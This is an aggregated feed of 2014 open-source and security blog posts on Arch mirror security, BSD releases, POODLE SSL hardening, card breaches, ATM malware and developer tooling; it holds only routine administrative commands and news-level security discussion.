Planet


Traffic Control

by Jesco Freund via My Universe »

Purely out of curiosity, I analyzed for my mirror server which protocols the accesses actually come in over. Here is the result:
I looked at a period of roughly two weeks, counting only actual file accesses – redirects and errors were not included in the evaluation.

The bulk of the accesses still comes in over IPv4 – even among nerds, the use of IPv6 does not seem to be particularly popular yet. Sure, native IPv6 straight from the DSL provider is still the exception in many places. But I would have expected a higher share of users of IPv6 tunnel services such as SixXS.

While the small share of IPv6 does not come entirely unexpected, I initially found the rather small share of HTTPS users shocking. Downloading packages over an unsecured connection saves a small amount of computing power, but at the same time it also makes it easier for an attacker to slip in manipulated packages. Or does it…?

Sure, the higher the share of encrypted connections on the Internet – ideally with PFS – the harder it becomes to manipulate software distributed over the net. But what does this look like for Arch Linux specifically? Let's take a look at all the places where an attacker could strike in order to put manipulated packages (e.g. with a built-in backdoor) into circulation.

At the Source

One theoretical possibility of course already exists upstream, i.e. before software even enters a distribution's sphere of responsibility. However, this is far less trivial than it may seem at first glance. You would have to concentrate on a piece of software that is part of the basic toolkit almost everywhere – such as glibc, bash, OpenSSL, or the Linux kernel itself.

As a rule, though, that means having to infiltrate a group of developers – a lengthy and resource-intensive undertaking with an uncertain outcome. A whole series of additional factors is decisive for the success of such an operation:

  • The infiltrator has to earn the trust of the other developers (e.g. in order to obtain commit rights)
  • The software's development process must not include public peer review (private peer review can be countered with a larger number of infiltrators)
  • The development model must not rely on a single central committer (as is the case with the Linux kernel, for example)
  • The software itself must not be the subject of overly intense scrutiny by third parties (as is currently the case with OpenSSL, for example)
  • The software must not be modified too heavily by the distributors through patches of their own, as happens with the Linux kernel.

Sure, a backdoor of your own in a central component of many Linux systems is an extremely rewarding target (for cyber criminals as well as for intelligence agencies and law enforcement), but it comes with so much effort and such a risk of discovery that there are simpler and, above all, cheaper ways.

Construction Site

It is probably easier to tamper with the packaging of software for a particular distribution. Code reviews for patches written by maintainers are the exception rather than the rule, and the risk of discovery is lower here – after all, maintainers deal with a large number of packages, so specialist knowledge of the internal structure of any particular piece of software is the exception rather than the rule.

Still, the problem remains that an existing community has to be infiltrated by an "agent" – again a lengthy and resource-intensive affair; especially since the reach of such an attack is already reduced to a fraction of what would be achievable with an upstream manipulation.

Road Hog

Manipulating software on the distribution path is more of a technical problem and does not require the lengthy subversion of a particular group of people. Both the distribution of the software packages to the various mirror servers and the transfer of the software to the end user can be attacked.

With Arch Linux, the mirror servers are synchronized via the rsync protocol, and thus unfortunately without encryption. That is efficient, but it opens the door wide to a man-in-the-middle attack. Other projects such as FreeBSD also synchronize their mirrors with rsync, but use the variant tunneled over SSH.
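For illustration, tunneling the mirror sync over SSH only means handing rsync a remote shell – a minimal sketch, with host names and paths being placeholders:

% rsync -avz --delete -e ssh mirror-master.example.org:/srv/archlinux/ /srv/mirror/archlinux/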

When it comes to delivery to the end user, with Arch Linux the latter calls the shots: many mirrors offer both HTTP and HTTPS, so in the end it is up to each user which type of connection is used.
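Picking the encrypted transport is just a matter of which entries you keep in /etc/pacman.d/mirrorlist – the mirror host name below is a placeholder:

Server = https://mirror.example.org/archlinux/$repo/os/$arch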

So that means… what?

As an end user you can hardly protect yourself against attacks in the upstream and packaging areas. For criminals, though, the comparatively high effort is likely to be a deterrent, while for authorities and intelligence agencies this method can presumably not be applied in a targeted enough way to infiltrate the computer of one specific "person of interest" (which, in times of big data, does not mean they won't do it anyway).

Attacks on the distribution path are easier to pull off, and the closer to the end user the attack takes place, the more precisely it can be aimed at specific persons. You can protect yourself against this with suitable transport encryption – but then, please, on all the transport routes a software package travels. Here the Arch Linux infrastructure team would still have to step up its game considerably.

Using HTTPS for the leg between mirror and end user therefore currently only protects against a targeted attack on a specific person; anyone who wants more reach simply attacks the synchronization between the mirror servers and thereby still catches the end users who believe they are safe because they use HTTPS. Nevertheless, I would recommend using HTTPS, since it at least makes one form of attack harder and at the same time increases the share of encrypted traffic on the Internet.

Finally, package signing remains as the last line of defense – after all, about two years ago Arch Linux caught up with Debian & Co. and equipped pacman with the corresponding functionality. Fortunately, Arch Linux does not use the mirror servers themselves to distribute the keys, but relies on (public) key servers and the HKP protocol instead. However, the user still bears the important responsibility of accepting new keys only after they have been thoroughly verified.
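A minimal sketch of that verification step with pacman-key (the key ID is purely hypothetical): inspect the fingerprint first, and only then sign the key locally.

% sudo pacman-key --finger ABCD1234
% sudo pacman-key --lsign-key ABCD1234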

PC-BSD 10.1-RC1 Released

by dru via Official PC-BSD Blog »

The PC-BSD team is pleased to announce the availability of RC1 images for the upcoming PC-BSD 10.1 release.

PC-BSD Notable Changes

* KDE 4.14.2
* GNOME 3.12.2
* Cinnamon 2.2.16
* Chromium 38.0.2125.104_1
* Firefox 33.0
* NVIDIA Driver 340.24
* Lumina desktop 0.7.0-beta
* Pkg 1.3.8_3
* New AppCafe HTML5 web/remote interface, for both desktop / server usage
* New CD-sized text-installer ISO files for TrueOS / server deployments
* New Centos 6.5 Linux emulation base
* New HostAP mode for Wifi GUI utilities
* Misc bug fixes and other stability improvements

TrueOS

Along with our traditional PC-BSD DVD ISO image, we have also created a CD-sized ISO image of TrueOS, our server edition.

This is a text-based installer which includes FreeBSD 10.0-Release under the hood. It includes the following features:

* ZFS on Root installation
* Boot-Environment support
* Command-Line versions of PC-BSD utilities, such as Warden, Life-Preserver and more.
* Support for full-disk (GELI) encryption without an unencrypted /boot partition

Updating

A testing update is available for 10.0.3 users to upgrade to 10.1-RC1. To apply this update, do the following:

As root, edit /usr/local/share/pcbsd/pc-updatemanager/conf/sysupdate.conf

Change “PATCHSET: updates”

to:

“PATCHSET: test-updates”
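If you prefer a one-liner, something like this should make the same change (a sketch, assuming the stock file contents):

% sudo sed -i '' 's/^PATCHSET: updates/PATCHSET: test-updates/' /usr/local/share/pcbsd/pc-updatemanager/conf/sysupdate.conf

Then check for available updates: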

% sudo pc-updatemanager check

This should show you a new “Update system to 10.1-RELEASE” patch available. To install it, run the following:

% sudo pc-updatemanager install 10.1-update-10152014-10

NOTICE

As with any major system upgrade, please back up important data and files beforehand!!!

This update will automatically reboot your system several times during the various upgrade phases; please expect it to take between 30 and 60 minutes.

Getting media

10.1-RC1 DVD/USB media can be downloaded from here via HTTP or Torrent.

Reporting Bugs

Found a bug in 10.1? Please report it (with as much detail as possible) to our bugs database.


Gone to the Dogs

by Jesco Freund via My Universe »

The latest annoyance around SSL goes by the name of POODLE – and for once it is not an implementation accident (as Heartbleed was), but a design flaw in SSLv3 that comes into play when the cipher block chaining mode is used for the symmetric encryption.

Now, SSLv3 has long since ceased to be a current protocol – but many servers still support it in order not to lock out older clients such as Internet Explorer 6 or older mobile clients completely. In doing so, however, they make themselves just as vulnerable to a man-in-the-middle attack in which an attacker forces the use of an old protocol version and a vulnerable cipher suite.

Ivan Ristic rates POODLE as considerably less critical than Heartbleed. Compared with the BEAST attack, however, which targets a similar weakness, Ristic considers the new hole considerably more critical, since fewer preconditions are required to exploit it – JavaScript enabled in the victim's browser is enough if the server does not explicitly forbid SSLv3.

For me, POODLE was the prompt to rework my SSL configuration once more. Very old clients unfortunately have to stay outside now (that also goes for the odd bot); in return, users of modern browsers can now be reasonably sure that the connection stays private and in most cases also offers forward secrecy:



I did leave TLS 1.0 enabled, though (and accepted a 5% deduction in the "Protocol Support" score for it), since relatively many browsers still do not support TLS 1.1 and 1.2, or do not support them cleanly; among them Internet Explorer up to and including version 10, Android up to and including 4.3, Java 6 and Java 7, the Bing and Google bots, …
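To check which protocol versions a server still accepts, a quick probe with openssl s_client is enough (the host name is a placeholder); after disabling SSLv3 the first command should fail to complete the handshake, while the second still succeeds:

% openssl s_client -connect www.example.org:443 -ssl3
% openssl s_client -connect www.example.org:443 -tls1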

The same goes for the cipher suites: restrictions that earn you 100% in the SSL Labs rating currently lock out some clients – among them Java 7 and 8 as well as various search engine bots. Current browsers are no problem, but some feed readers would be locked out as well – and that, after all, is the last thing you want for a blog…

Tor-ramdisk 20141022 released

by blueness via Anthony G. Basile »

Following the latest and greatest SSL exploit, CVE-2014-3566, aka the POODLE issue, the tor team released version 0.2.4.25.  For those of you not familiar, tor is a system of online anonymity which encrypts and bounces your traffic through relays so as to obfuscate the origin.  Back in 2008, I started a uClibc-based micro Linux distribution, called tor-ramdisk, whose only purpose is to host a tor relay in a hardened Gentoo environment purely in RAM.

While the POODLE bug is addressed on the openssl side by the latest release 1.0.1j, the tor team decided to turn off the affected protocol, SSLv3, requiring TLS 1.0 or later.  They also fixed tor to avoid a crash when built using openssl 0.9.8zc, 1.0.0o, or 1.0.1j with the 'no-ssl3' configuration option.  These important fixes to two major components of tor-ramdisk warranted a new release.  Take a look at the upstream ChangeLog for more information.

Since I was upgrading stuff, I also upgraded the kernel to vanilla 3.17.1 + Gentoo's hardened-patches-3.17.1-1.extras.  All the other components remain the same as the previous release.

i686:
Homepage: http://opensource.dyc.edu/tor-ramdisk
Download:  http://opensource.dyc.edu/tor-ramdisk-downloads

x86_64:
Homepage: http://opensource.dyc.edu/tor-x86_64-ramdisk
Download:  http://opensource.dyc.edu/tor-x86_64-ramdisk-downloads

‘Spam Nation’ Publisher Discloses Card Breach

by BrianKrebs via Krebs on Security »

In the interests of full disclosure: Sourcebooks – the company that on Nov. 18 is publishing my upcoming book about organized cybercrime — disclosed last week that a breach of its Web site shopping cart software may have exposed customer credit card and personal information.

Fortunately, this breach does not affect readers who have pre-ordered Spam Nation through the retailers I’ve been recommending — Amazon, Barnes & Noble, and Politics & Prose.  I mention this breach mainly to get out in front of it, and because of the irony and timing of this unfortunate incident.

From Sourcebooks’ disclosure (PDF) with the California Attorney General’s office:

“Sourcebooks recently learned that there was a breach of the shopping cart software that supports several of our websites on April 16, 2014 – June 19, 2014 and unauthorized parties were able to gain access to customer credit card information. The credit card information included card number, expiration date, cardholder name and card verification value (CVV2). The billing account information included first name, last name, email address, phone number, and address. In some cases, shipping information was included as first name, last name, phone number, and address. In some cases, account password was obtained too. To our knowledge, the data accessed did not include any Track Data, PIN Number, Printed Card Verification Data (CVD). We are currently in the process of having a third-party forensic audit done to determine the extent of this breach.”

So again, if you have pre-ordered the book from somewhere other than Sourcebook’s site (and that is probably 99.9999 percent of you who have already pre-ordered), you are unaffected.

I think there are some hard but important lessons here about the wisdom of smaller online merchants handling credit card transactions. According to Sourcebooks founder Dominique Raccah, the breach affected approximately 5,100 people who ordered from the company’s Web site between mid-April and mid-June of this year. Raccah said the breach occurred after hackers found a security vulnerability in the site’s shopping cart software.

Experts say tens of thousands of businesses that rely on shopping cart software are a major target for malicious hackers, mainly because shopping cart software is generally hard to do well.

“Shopping cart software is extremely complicated and tricky to get right from a security perspective,” said Jeremiah Grossman, founder and chief technology officer for WhiteHat Security, a company that gets paid to test the security of Web sites.  “In fact, no one in my experience gets it right their first time out. That software must undergo serious battlefield testing.”

Grossman suggests that smaller merchants consider outsourcing the handling of credit cards to a solid and reputable third-party. Sourcebooks’ Raccah said the company is in the process of doing just that.

“Make securing credit cards someone else’s problem,” Grossman said. “Yes, you take a little bit of a margin hit, but in contrast to the effort of do-it-yourself [approaches] and breach costs, it’s worth it.”

What’s more, as an increasing number of banks begin issuing more secure chip-based cards  — and by extension more main street merchants in the United States make the switch to requiring chip cards at checkout counters — fraudsters will begin to focus more of their attention on attacking online stores. The United States is the last of the G20 nations to move to chip cards, and in virtually every country that’s made the transition the fraud on credit cards didn’t go away, it just went somewhere else. And that somewhere else in each case manifested itself as increased attacks against e-commerce merchants.

If you haven’t pre-ordered Spam Nation yet, remember that all pre-ordered copies will ship signed by Yours Truly. Also, the first 1,000 customers to order two or more copies of the book (including any combination of digital, audio or print editions) will also get a Krebs On Security-branded ZeusGard. So far, approximately 400 readers have taken us up on this offer! Please make sure that if you do pre-order, that you forward a proof-of-purchase (receipt, screen shot of your Kindle order, etc.) to spamnation@sourcebookspr.com.

Pre-order two or more copies of Spam Nation and get this “Krebs Edition” branded ZeusGard.

FreeBSD 10.1-RC3 Available

by Webmaster Team via FreeBSD News Flash »

The third RC build for the FreeBSD 10.1 release cycle is now available. ISO images for the amd64, armv6, i386, ia64, powerpc, powerpc64 and sparc64 architectures are available on most of our FreeBSD mirror sites.

Getting snmpwalk to talk to snmpd on FreeBSD

by Dan Langille via Dan Langille's Other Diary »

Contrary to all the examples I found, it's not easy to get snmpwalk to communicate with snmpd. I am using the net-mgmt/net-snmp port with the default configuration options. It was installed with:

pkg install net-mgmt/net-snmp

This is the minimal configuration file, which should be placed at /usr/local/etc/snmp/snmpd.conf:

rocommunity public

When starting, you should see [something [...]
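A quick way to test such a setup (a sketch; it assumes the port's rc script is named snmpd and uses the 'public' community from the minimal config above):

% sudo sysrc snmpd_enable=YES
% sudo service snmpd start
% snmpwalk -v 2c -c public localhost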

Google Accounts Now Support Security Keys

by BrianKrebs via Krebs on Security »

People who use Gmail and other Google services now have an extra layer of security available when logging into Google accounts. The company today incorporated into these services the open Universal 2nd Factor (U2F) standard, a physical USB-based second factor sign-in component that only works after verifying the login site is truly a Google site.

A $17 U2F device made by Yubico.
The U2F standard (PDF) is a product of the FIDO (Fast IDentity Online) Alliance, an industry consortium that’s been working to come up with specifications that support a range of more robust authentication technologies, including biometric identifiers and USB security tokens.

The approach announced by Google today essentially offers a more secure way of using the company’s 2-step authentication process. For several years, Google has offered an approach that it calls “2-step verification,” which sends a one-time pass code to the user’s mobile or land line phone.

2-step verification makes it so that even if thieves manage to steal your password, they still need access to your mobile or land line phone if they’re trying to log in with your credentials from a device that Google has not previously seen associated with your account. As Google notes in a support document, security key “offers better protection against this kind of attack, because it uses cryptography instead of verification codes and automatically works only with the website it’s supposed to work with.”

Unlike a one-time token approach, the security key does not rely on mobile phones (so no batteries needed), but the downside is that it doesn’t work for mobile-only users because it requires a USB port. Also, the security key doesn’t work for Google properties on anything other than Chrome.

The move comes a day after Apple launched its Apple Pay platform, a wireless payment system that takes advantage of the near-field communication (NFC) technology built into the new iPhone 6, which allows users to pay for stuff at participating merchants merely by tapping the phone on the store’s payment terminal.

I find it remarkable that Google, Apple and other major tech companies continue to offer more secure and robust authentication options than are currently available to consumers by their financial institutions. I, for one, will be glad to see Apple, Google or any other legitimate player give the entire mag-stripe based payment infrastructure a run for its money. They could hardly do worse.

Soon enough, government Web sites may also offer consumers more authentication options than many financial sites.  An Executive Order announced last Friday by The White House requires the National Security Council Staff, the Office of Science and Technology Policy and the Office of Management and Budget (OMB) to submit a plan to ensure that all agencies making personal data accessible to citizens through digital applications implement multiple layers of identity assurance, including multi-factor authentication. Verizon Enterprise has a good post with additional details of this announcement.

KDEConnect in PC-BSD — Remote Control Your Desktop From Your Android Phone

by Josh Smith via Official PC-BSD Blog »

Hey guys, check out our video on KDEConnect in PC-BSD on YouTube!  It's an awesome new app that gives you text messages, phone notifications, incoming call notifications, media remote control, and more!


Banks: Credit Card Breach at Staples Stores

by BrianKrebs via Krebs on Security »

Multiple banks say they have identified a pattern of credit and debit card fraud suggesting that several Staples Inc. office supply locations in the Northeastern United States are currently dealing with a data breach. Staples says it is investigating “a potential issue” and has contacted law enforcement.

According to more than a half-dozen sources at banks operating on the East Coast, it appears likely that fraudsters have succeeded in stealing customer card data from some subset of Staples locations, including seven Staples stores in Pennsylvania, at least three in New York City, and another in New Jersey.

Framingham, Mass.-based Staples has more than 1,800 stores nationwide, but so far the banks contacted by this reporter have traced a pattern of fraudulent transactions on a group of cards that had all previously been used at a small number of Staples locations in the Northeast.

The fraudulent charges occurred at other (non-Staples) businesses, such as supermarkets and other big-box retailers. This suggests that the cash registers in at least some Staples locations may have fallen victim to card-stealing malware that lets thieves create counterfeit copies of cards that customers swipe at compromised payment terminals.

Asked about the banks’ claims, Staples’s Senior Public Relations Manager Mark Cautela confirmed that Staples is in the process of investigating a “potential issue involving credit card data and has contacted law enforcement.”

“We take the protection of customer information very seriously, and are working to resolve the situation,” Cautela said. “If Staples discovers an issue, it is important to note that customers are not responsible for any fraudulent activity on their credit cards that is reported on [in] a timely basis.”  

Spike in Malware Attacks on Aging ATMs

by BrianKrebs via Krebs on Security »

This author has long been fascinated with ATM skimmers, custom-made fraud devices designed to steal card data and PINs from unsuspecting users of compromised cash machines. But a recent spike in malicious software capable of infecting and jackpotting ATMs is shifting the focus away from innovative, high-tech skimming devices toward the rapidly aging ATM infrastructure in the United States and abroad.

Last month, media outlets in Malaysia reported that organized crime gangs had stolen the equivalent of about USD $1 million with the help of malware they’d installed on at least 18 ATMs across the country. Several stories about the Malaysian attack mention that the ATMs involved were all made by ATM giant NCR. To learn more about how these attacks are impacting banks and the ATM makers, I reached out to Owen Wild, NCR’s global marketing director, security compliance solutions.

Wild said ATM malware is here to stay and is on the rise.



BK: I have to say that if I’m a thief, injecting malware to jackpot an ATM is pretty money. What do you make of reports that these ATM malware thieves in Malaysia were all knocking over NCR machines?

OW: The trend toward these new forms of software-based attacks is occurring industry-wide. It’s occurring on ATMs from every manufacturer, multiple model lines, and is not something that is endemic to NCR systems. In this particular situation for the [Malaysian] customer that was impacted, it happened to be an attack on a Persona series of NCR ATMs. These are older models. We introduced a new product line for new orders seven years ago, so the newest Persona is seven years old.

BK: How many of your customers are still using this older model?

OW: Probably about half the install base is still on Personas.

BK: Wow. So, what are some of the common trends or weaknesses that fraudsters are exploiting that let them plant malware on these machines? I read somewhere that the crooks were able to insert CDs and USB sticks in the ATMs to upload the malware, and they were able to do this by peeling off the top of the ATMs or by drilling into the facade in front of the ATM. CD-ROM and USB drive bays seem like extraordinarily insecure features to have available on any customer-accessible portions of an ATM.

OW: What we’re finding is these types of attacks are occurring on standalone, unattended types of units where there is much easier access to the top of the box than you would normally find in the wall-mounted or attended models.

BK: Unattended….meaning they’re not inside of a bank or part of a structure, but stand-alone systems off by themselves.

OW: Correct.

BK: It seems like the other big factor with ATM-based malware is that so many of these cash machines are still running Windows XP, no?

This new malware, detected by Kaspersky Lab as Backdoor.MSIL.Tyupkin, affects ATMs from a major ATM manufacturer running Microsoft Windows 32-bit.
OW: Right now, that’s not a major factor. It is certainly something that has to be considered by ATM operators in making their migration move to newer systems. Microsoft discontinued updates and security patching on Windows XP, with very expensive exceptions. Where it becomes an issue for ATM operators is that maintaining Payment Card Industry (credit and debit card security standards) compliance requires that the ATM operator be running an operating system that receives ongoing security updates. So, while many ATM operators certainly have compliance issues, to this point we have not seen the operating system come into play.

BK: Really?

OW: Yes. If anything, the operating systems are being bypassed or manipulated with the software as a result of that.

BK: Wait a second. The media reports to date have observed that most of these ATM malware attacks were going after weaknesses in Windows XP?

OW: It goes deeper than that. Most of these attacks come down to two different ways of jackpotting the ATM. The first is what we call “black box” attacks, where some form of electronic device is hooked up to the ATM — basically bypassing the infrastructure in the processing of the ATM and sending an unauthorized cash dispense code to the ATM. That was the first wave of attacks we saw that started very slowly in 2012, went quiet for a while and then became active again in 2013.

The second type that we’re now seeing more of is attacks that start with the introduction of malware into the machine, and that kind of attack is a little less technical to get on the older machines if protective mechanisms aren’t in place.

BK: What sort of protective mechanisms, aside from physically securing the ATM?

OW: If you work on the configuration setting…for instance, if you lock down the BIOS of the ATM to eliminate its capability to boot from USB or CD drive, that gets you about as far as you can go. In high risk areas, these are the sorts of steps that can be taken to reduce risks.

BK: Seems like a challenge communicating this to your customers who aren’t anxious to spend a lot of money upgrading their ATM infrastructure.

OW: Most of these recommendations and requirements have to be considerate of the customer environment. We make sure we’ve given them the best guidance we can, but at end of the day our customers are going to decide how to approach this.

BK: You mentioned black-box attacks earlier. Is there one particular threat or weakness that makes this type of attack possible? One recent story on ATM malware suggested that the attackers may have been aided by the availability of ATM manuals online for certain older models.

OW: The ATM technology infrastructure is all designed on multivendor capability. You don’t have to be an ATM expert or have inside knowledge to generate or code malware for ATMs. Which is what makes the deployment of preventative measures so important. What we’re faced with as an industry is a combination of vulnerability on aging ATMs that were built and designed at a point where the threats and risk were not as great.



According to security firm F-Secure, the malware used in the Malaysian attacks was “PadPin,” a family of malicious software first identified by Symantec. Also, Russian antivirus firm Kaspersky has done some smashing research on a prevalent strain of ATM malware that it calls “Tyupkin.” Their write-up on it is here, and the video below shows the malware in action on a test ATM.

In a report published this month, the European ATM Security Team (EAST) said it tracked at least 20 incidents involving ATM jackpotting with malware in the first half of this year. “These were ‘cash out’ or ‘jackpotting’ attacks and all occurred on the same ATM type from a single ATM deployer in one country,” EAST Director Lachlan Gunn wrote. “While many ATM Malware attacks have been seen over the past few years in Russia, Ukraine and parts of Latin America, this is the first time that such attacks have been reported in Western Europe. This is a worrying new development for the industry in Europe.”

Card skimming incidents fell by 21% compared to the same period in 2013, while overall ATM related fraud losses of €132 million (~USD $158 million) were reported, up 7 percent from the same time last year.


How do I run ~arch Perl on a stable Gentoo system?

by Andreas via the dilfridge blog »

Here's a small piece of advice for all who want to upgrade their Perl to the very newest available, but still keep running an otherwise stable Gentoo installation: These three lines are exactly what needs to go into /etc/portage/package.keywords:
dev-lang/perl
virtual/perl-*
perl-core/*
Of course, as always, bugs may be present; what you get as a Perl installation is called unstable or testing for a reason. We're looking forward to your reports on our bugzilla.
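Once the keywords are in place, the upgrade itself is just a regular update – a sketch, with perl-cleaner used afterwards to rebuild installed modules against the new Perl:

emerge --ask --update --deep dev-lang/perl
perl-cleaner --all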

VC4 driver status update

by Eric Anholt via anholt's lj »

I've just spent another week hanging out with my Broadcom and Raspberry Pi teammates, and it's unblocked a lot of my work.

Notably, I learned some unstated rules about how loading and storing from the tilebuffer work, which has significantly improved stability on the Pi (as opposed to simulation, which only asserted about following half of these rules).

I got an intro on the debug process for GPU hangs, which ultimately just looks like "run it through simpenrose (the simulator) directly. If that doesn't catch the problem, you capture a .CLIF file of all the buffers involved and feed it into RTL simulation, at which point you can confirm for yourself that yes, it's hanging, and then you hand it to somebody who understands the RTL and they tell you what the deal is." There's also the opportunity to use JTAG to look at the GPU's perspective of memory, which might be useful for some classes of problems. I've started on .CLIF generation (currently simulation-environment-only), but I've got some bugs in my generated files because I'm using packets that the .CLIF generator wasn't prepared for.

I got an overview of the cache hierarchy, which pointed out that I wasn't flushing the ARM dcache to get my writes out into system L2 (more like an L3) so that the GPU could see it. This should also improve stability, since before we were only getting lucky that the GPU would actually see our command stream.

Most importantly, I ended up fixing a mistake in my attempt at reset using the mailbox commands, and now I've got working reset. Testing cycles for GPU hangs have dropped from about 5 minutes to 2-30 seconds. Between working reset and improved stability from loads/stores, we're at the point that X is almost stable. I can now run piglit on actual hardware! (it takes hours, though)

On the X front, the modesetting driver is now merged to the X Server with glamor-based X rendering acceleration. It also happens to support DRI3 buffer passing, but not Present's pageflipping/vblank synchronization. I've submitted a patch series for DRI2 support with vblank synchronization (again, no pageflipping), which will get us more complete GLX extension support, including things like GLX_INTEL_swap_event that gnome-shell really wants.

In other news, I've been talking to a developer at Raspberry Pi who's building the KMS support. Combined with the discussions with keithp and ajax last week about compositing inside the X Server, I think we've got a pretty solid plan for what we want our display stack to look like, so that we can get GL swaps and video presentation into HVS planes, and avoid copies on our very bandwidth-limited hardware. Baby steps first, though -- he's still working on putting giant piles of clock management code into the kernel module so we can even turn on the GPU and displays on our own without using the firmware blob.

Testing status:
- 93.8% passrate on piglit on simulation
- 86.3% passrate on piglit gpu.py on Raspberry Pi

All those opcodes I mentioned in the previous post are now completed -- sadly, I didn't get people up to speed fast enough to contribute before those projects were the biggest things holding back the passrate. I've started a page at http://dri.freedesktop.org/wiki/VC4/ for documenting the setup process and status.

And now, next steps. Now that I've got GPU reset, a high priority is switching to interrupt-based render job tracking and putting an actual command queue in the kernel so we can have multiple GPU jobs queued up by userland at the same time (the VC4 sadly has no ringbuffer like other GPUs have). Then I need to clean up user <-> kernel ABI so that I can start pushing my linux code upstream, and probably work on building userspace BO caching.

Lots of new challenges ahead

by swift via Simplicity is a form of art... »

I've been pretty busy lately, albeit mostly behind the scenes, which has led to lower activity within the free software communities that I'm active in. Still, I'm not planning any exit – on the contrary: lots of ideas are just waiting for some free time to engage with them. So what are the challenges that have been taking up my time?

One of them is that I recently moved. And with moving comes a lot of work in getting the place into good shape and getting settled. Today I finished the last job that I wanted to finish in my apartment in the short term, so that's one thing off my TODO list.

Another one is that I started an intensive master-after-master programme with the subject of Enterprise Architecture. This not only takes up quite some ex-cathedra time, but also additional hours of studying (and for the moment also exams). But I’m really satisfied that I can take up this course, as I’ve been wandering around in the world of enterprise architecture for some time now and want to grow even further in this field.

But that’s not all. One of my side activities has been blooming a lot, and I recently reached the 200th server that I’m administering (although I think this number will reduce to about 120 as I’m helping one organization with handing over management of their 80+ systems to their own IT staff). Together with some friends (who also have non-profit customers’ IT infrastructure management as their side-business) we’re now looking at consolidating our approach to system administration (and engineering).

I’m also looking at investing time and resources in a start-up, depending on the business plan and required efforts. But more information on this later when things are more clear :-)

Fix ALL the BUGS!

by lu_zero via Luca Barbato »

Vittorio started (with some help from me) to fix all the issues pointed out by Coverity.

Static analysis

Coverity (and scan-build) are quite useful for spotting mistakes, even if their false-positive ratio tends to be quite high. Even the false positives are usually interesting, since they point at code that is unnecessarily convoluted. The code should be as simple as possible, but not simpler.

The basic idea behind those tools is to try to follow the code paths while compiling them and spot what could go wrong (e.g. you are feeding a NULL to a function that would dereference it).
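For scan-build the entry barrier is low: you just wrap your normal build and it writes an HTML report of the paths it followed – a sketch, assuming a make-based build:

scan-build -o /tmp/scan-results make -j8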

The problems with this approach are usually two: false positives due to the limited scope of the analyzer, and false negatives due to shadowing.

False Positives

Coverity might assume certain inputs are valid even if they are made impossible by some initial checks earlier in the code flow.

In those cases you should spend enough time making sure Coverity is not right and those faulty inputs aren't slipping in somewhere. NEVER just add some checks to the code it points at as a first move; you might end up hiding real issues (e.g. if Coverity complains about an uninitialized variable, do not just initialize it to something arbitrary – check why that happens and whether the logic behind it is wrong).

If Coverity is confused, your compiler is confused as well and will produce suboptimal executables. Properly fixing those issues can result in useful speedups. Simpler code is usually faster.

Ever increasing issue count

While fixing issues using those tools you might notice to your surprise that every time you fix something, something new appears out of thin air.

This is not magic; it is simply that the static analyzers usually put some limit on how deep they go, depending on the issues already present and how much time has been spent already.

That surprise has been fun, since apparently some of the time limit is per compilation unit, so splitting large files into smaller chunks gets us more results (while also speeding up the build process thanks to better parallelism).

Usually fixing some high-impact issue gets us 3 to 5 new small-impact issues.

I like solving puzzles, so I do not mind having more fun; sadly I have not had much spare time to play this game lately.

Merge ALL the FIXES

Properly fixing all the issues is a lofty goal, and as usual having a patch is just half of the work. Usually two sets of eyes work better than one, and an additional brain with different expertise can prevent a good chunk of mistakes. The review process is the other, sometimes neglected, half of solving issues.
So far 100+ patches have piled up over the past weeks, and now they are being sent in small batches to ease the work of review. (I have something brewing to make reviewing simpler, as you might know.)

During review, probably about 1/10 of the patches will be rejected and the corresponding Coverity report updated with enough information to explain why it is a false positive, or why the dangerous or strange behaviour pointed out is intentional.

The fixes will land in the next point releases of our 4 maintained major releases: 0.8, 9, 10 and 11. Many thanks to the volunteers who spend their free time keeping all the branches up to date!

Tracking patches

by lu_zero via Luca Barbato »

You need good tools to do a good job.

Even the best tool in the hand of a novice is a club.

I'm quite fond of improving the tools I use, and that's why I started getting involved in Gentoo, Libav, VLC and plenty of other projects.

I already discussed lldb and asan/valgrind; my current focus now is patch trackers, in part due to the current effort to improve the Libav one.

Contributors

Before talking about patches and their tracking, I'd like to digress a little on who produces them: the mythical Contributor. Without contributions an open source project would not exist.

You might have recurring contributions and one-off or occasional contributions. Both are quite important.
In general you should try to turn occasional contributors into recurring contributors.

A recurring contributor may accept spending some additional time to set up the environment needed to actually get their contribution back to the community; a sporadic contributor can easily be put off if the effort required to send the patch is larger than writing the patch itself.

The project maintainers should make the life of contributors as simple as possible.

Patches and Revision Control

Lately most open source projects have seen the light and started to use decentralized revision control systems, and thanks to github and many others the concept of issuing pull requests is becoming part of our culture – and with it, hopefully, a wider acceptance of the fact that code should be reviewed before it is merged.

Pull Request

In a decentralized development scenario, new code is usually developed in topic branches, routinely rebased against master until the set is ready; then the set of changes (called a series or patchset) is reviewed and, after some rounds of fixes, eventually merged. Thanks to bitbucket we now have forking, spooning and knifing as part of the jargon.

The review (and merge) step, quite properly, is called knifing (or stabbing): you have to dice, slice and polish the code before merging it.

Reviewing code

During a review, bugs are usually spotted and ways to improve are suggested. Patches might be split or merged together, and the series reworked and improved a lot.

The process is usually time consuming, even more so for an organization made of volunteers: writing code is fun, addressing spotted issues is less so, and reviewing someone else's code even less.

Sadly it is a necessary annoyance, since otherwise the errors (and horrors) that slip through would be much bigger and probably much more numerous. If you do not care about code quality and what you are writing is not used by other people, you can probably ignore that; otherwise you should feel somewhat concerned that what you wrote might turn some people's lives into a sea of pain. (On the other hand, some gratitude for such a daunting effort is usually welcome.)

Pull request management

The old-fashioned way to issue a pull request is either to poke somebody and tell them that your branch is ready for merge, or to just make a set of patches and mail them to whoever is in charge of integrating code into the main branch.

git provides a nifty tool for that called git send-email, and it is quite common to send sets of patches (usually called series) to a mailing list. You get feedback by email, and you can update the set using the --in-reply-to option and the message id.
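As a sketch (the list address and message id are placeholders): the first command mails the last three commits as a series, the second sends an updated single patch threaded under the original discussion.

% git send-email --to=project-devel@example.org -3
% git send-email --to=project-devel@example.org --in-reply-to='<original-message-id@example.org>' -1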

Platforms such as github and similar are more web centric and require you to use the web interface to issue and review the request. No additional tools are required beside your git and a browser.

gerrit and reviewboard provide custom scripts to set up ephemeral branches in some staging area; the review process then requires a browser again. Every commit gets some tool-specific metadata to ease tracking changes across series revisions. This approach is the most setup-intensive.

Pro and cons

Mailing list approach

Testing patches from the mailing list is quite simple thanks to git am, and if the reply-to field is used properly, updates appear sorted in a sensible way.
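A sketch of the testing side, assuming the series was saved from the mail client as an mbox file:

% git checkout -b review origin/master
% git am --3way series.mbox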

This method is the simplest for people used to having an email client always open next to a console (if they are using a well-configured emacs or vim they literally do not move away from the editor).

